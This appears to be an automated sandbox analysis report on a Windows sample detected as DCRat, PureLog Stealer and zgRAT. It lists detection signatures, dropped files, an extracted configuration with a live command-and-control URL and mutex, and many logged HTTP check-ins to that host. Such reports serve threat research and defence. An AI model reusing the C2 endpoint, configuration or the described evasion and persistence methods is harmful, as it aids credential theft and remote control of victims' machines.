Windows Analysis Report
lv961v43L3.exe

Overview

General Information

Sample name: lv961v43L3.exe
renamed because original name is a hash value
Original sample name: 76802a2f25a771332d8c00ee56975818.exe
Analysis ID: 1531317
MD5: 76802a2f25a771332d8c00ee56975818
SHA1: 2fa3d8e0a7d3285da7894c68983fcff150714559
SHA256: c877d0b38b1a395b38ff44494ea2d5e6f826c751503ae8c3d90e3afa9d6ff348
Tags: DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

barindex
Source: lv961v43L3.exe Avira: detected
Source: C:\Users\user\Desktop\DBipIDSx.log Avira: detection malicious, Label: TR/Agent.jbwuj
Source: C:\Users\user\Desktop\QaswzdXY.log Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\MnaxWgIk.log Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\Default\SystemSettings.exe Avira: detection malicious, Label: HEUR/AGEN.1329680
Source: C:\Recovery\apERZQztEJsqymITPFxguVe.exe Avira: detection malicious, Label: HEUR/AGEN.1329680
Source: C:\Users\user\Desktop\SzzvMtRI.log Avira: detection malicious, Label: TR/Agent.jbwuj
Source: C:\Users\user\AppData\Local\Temp\rjP0QDXGdr.bat Avira: detection malicious, Label: BAT/Delbat.C
Source: 00000000.00000002.2085959223.0000000012641000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: DCRat {"C2 url": "http://863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic", "MUTEX": "DCR_MUTEX-DDVr7jAKL4sPNJFYbkfE", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "false", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\Recovery\apERZQztEJsqymITPFxguVe.exe ReversingLabs: Detection: 70%
Source: C:\Users\Default\SystemSettings.exe ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\DBipIDSx.log ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\HkLqVmri.log ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\KzWplSMm.log ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\LRfgsxYe.log ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\MnaxWgIk.log ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\QaswzdXY.log ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\SzzvMtRI.log ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\UQjmGZYR.log ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\aBctEWCA.log ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\yHDAltbA.log ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\ysVaBXSD.log ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\zpwiWXhy.log ReversingLabs: Detection: 20%
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe ReversingLabs: Detection: 73%
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe ReversingLabs: Detection: 73%
Source: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe ReversingLabs: Detection: 73%
Source: lv961v43L3.exe ReversingLabs: Detection: 70%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\BQDZBqHE.log Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\QaswzdXY.log Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\MnaxWgIk.log Joe Sandbox ML: detected
Source: C:\Users\Default\SystemSettings.exe Joe Sandbox ML: detected
Source: C:\Recovery\apERZQztEJsqymITPFxguVe.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\Gnkizmcn.log Joe Sandbox ML: detected
Source: lv961v43L3.exe Joe Sandbox ML: detected
Source: lv961v43L3.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: lv961v43L3.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.pdb source: lv961v43L3.exe, 00000000.00000002.2080922506.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\10rvn1je\10rvn1je.pdb source: lv961v43L3.exe, 00000000.00000002.2080922506.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp

Spreading

barindex
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior

Networking

barindex
Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49760 -> 188.114.96.3:80
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 384Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2580Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1916Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1916Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 157336Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1916Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1916Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----D8uRY6zZHiCD11yIzdIT3kMfNkb2krW7GnUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2766Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1892Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1972Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1972Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1992Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----iXBE9x7sAZ9s8LIMWmsWdYRkexiMsvuP81User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 3014Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1972Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2580Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1980Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1992Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
